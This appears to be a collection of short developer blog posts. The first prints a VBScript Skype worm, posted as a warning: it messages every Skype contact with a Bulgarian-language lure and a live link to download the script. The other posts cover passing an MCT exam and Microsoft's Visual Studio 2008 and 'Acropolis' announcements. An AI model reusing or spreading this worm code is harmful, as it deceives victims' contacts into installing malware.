today a friend of mine sent me a virus... What a friend, huh?! :) No he warned me not to start it :)
This is a virus which uses automation same as "I love you" (description)
Here is the code (please do not execute it!!!)
on error resume next
set NrrlP = WScript.CreateObject("Scripting.FileSystemObject")
set uDlVA = wscript.createobject("wscript.shell")
set yADAl = WScript.CreateObject("Skype4COM.Skype", "Skype_")
For Each GAG In yADAl.Friends
yADAl.SendMessage GAG.handle,"Здравейте, ако желаете да подобрите вашият Skype и да добавите следните функции към него: Нови емотикони, Цветно писане, Безплатни SMS-и, Безплатни разговори до GSM и телефон в България и чужбина, Фотоалбум; Отидете на http://SKYPE.miglen.com и си свалете новата версия! Можете директно да си я свалите от този линк: http://skype.miglen.com/skype.vbs"
NOTE: Strings are in Bulgarian and the script sends a message to all contacts in Address book in Skype with fake message that call to go and download the virus.
URLs are intentionally left so please do not execute it!!!
I post this to show how simple and dangerous could be the scripts. So execute scripts only form trusted sources!!!
Today I passed my MCT exam and now I am part of that community of highly-qualified experts.
I would like to thanks to all my friends and supporters
On TechEd07 Microsoft announced official names of next version of Visual studio and SQL Server. Both will be named according year of the release - accordingly Visual Studio 2008 and SQL Server 2008 - following marketing strategy that started with windows 95 :)
Also there is new framework that comes to help developing rich clients - Microsoft codename "Acropolis".
The Microsoft code name “Acropolis” Community Technology Preview 1 is a set of components and tools that make it easier for developers to build and manage modular, business focused, client .NET applications. Acropolis is part of the “.NET Client Futures” wave of releases, our preview of upcoming technologies for Windows client development.
Acropolis builds on the rich capabilities of Microsoft Windows and the .NET Framework, including Windows Presentation Foundation (WPF), by providing tools and pre-built components that help developers quickly assemble applications from loosely-coupled parts and services. With Acropolis you will be able to:
- Quickly create WPF enabled user experiences for your client applications.
- Build client applications from reusable, connectable, modules that allow you to easily create complex, business-focused applications in less time.
- Integrate and host your modules in applications such as Microsoft Office, or quickly build stand-alone client interfaces.
- Change the look and feel of your application quickly using built-in themes, or custom designs using XAML.
- Add features such as workflow navigation and user-specific views with minimal coding.
- Manage, update, and deploy your application modules quickly and easily.
(via Marto Kulov's blog)